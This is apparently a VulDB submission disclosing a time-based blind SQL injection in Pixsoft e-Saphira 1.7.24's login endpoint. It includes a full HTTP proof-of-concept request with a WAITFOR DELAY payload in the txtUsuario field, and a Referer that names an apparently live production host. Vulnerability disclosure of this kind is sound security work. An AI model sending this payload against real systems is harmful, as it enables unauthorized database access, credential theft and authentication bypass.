Submit #503260: Pix Software E-Saphira 1.7.24 Blind Time Based SQL Injectioninfo

Title	Pix Software E-Saphira 1.7.24 Blind Time Based SQL Injection
Description	Time-Based Blind SQL Injection in e-Saphira 1.7.24 Vendor: Pixsoft Product: e-Saphira Version Affected: 1.7.24 Vulnerability Type: Time-Based Blind SQL Injection Description: A Time-Based Blind SQL Injection vulnerability has been discovered in e-Saphira 1.7.24, a software solution developed by Pixsoft. The issue resides in the login endpoint: /servlet?act=login&tipo=1 The parameter txtUsuario is vulnerable to SQL Injection, allowing an attacker to manipulate database queries. By injecting a time delay, it was confirmed that the database is processing unauthorized SQL commands. Proof of Concept (PoC): POST /servlet?act=login&tipo=1 HTTP/1.1 Host: X.X.X.X Cookie: JSESSIONID=D43363065700615B947A5D9C7BD48AA2 Content-Length: 51 Cache-Control: max-age=0 Sec-Ch-Ua: "Chromium";v="133", "Not(A:Brand";v="99" Sec-Ch-Ua-Mobile: ?0 Sec-Ch-Ua-Platform: "Windows" Accept-Language: pt-BR,pt;q=0.9 Origin: X.X.X.X Content-Type: application/x-www-form-urlencoded Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/x.x.x.x Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document Referer: https://saphira-prod.granado.com.br/servlet?act=login&tipo=1 Accept-Encoding: gzip, deflate, br Priority: u=0, i Connection: keep-alive txtUsuario='+WAITFOR+DELAY+'0:0:5'--&txtSenha=test the server’s response time increases by approximately 5 seconds, indicating that the injected SQL command was executed successfully. This confirms that the application is vulnerable to time-based blind SQL injection. Impact: An attacker exploiting this vulnerability can: Extract sensitive database information, such as user credentials. Bypass authentication mechanisms. Modify or delete data within the database. Chain the attack with other vulnerabilities for further exploitation. Since this is a blind SQL Injection, attackers can iteratively extract data by analyzing response times. By: Yago Martins
Source	⚠️ https://github.com/yago3008/cves
User	y4g0 (UID 80480)
Submission	02/18/2025 08:40 PM (3 months ago)
Moderation	03/01/2025 08:50 AM (11 days later)
Status	Accepted
VulDB Entry	298066 [Pixsoft E-Saphira 1.7.24 Login Endpoint servlet?act=login&tipo=1 txtUsuario sql injection]
Points	20

◂ Previous Overview Next ▸

Are you interested in using VulDB?

Download the whitepaper to learn more about our service!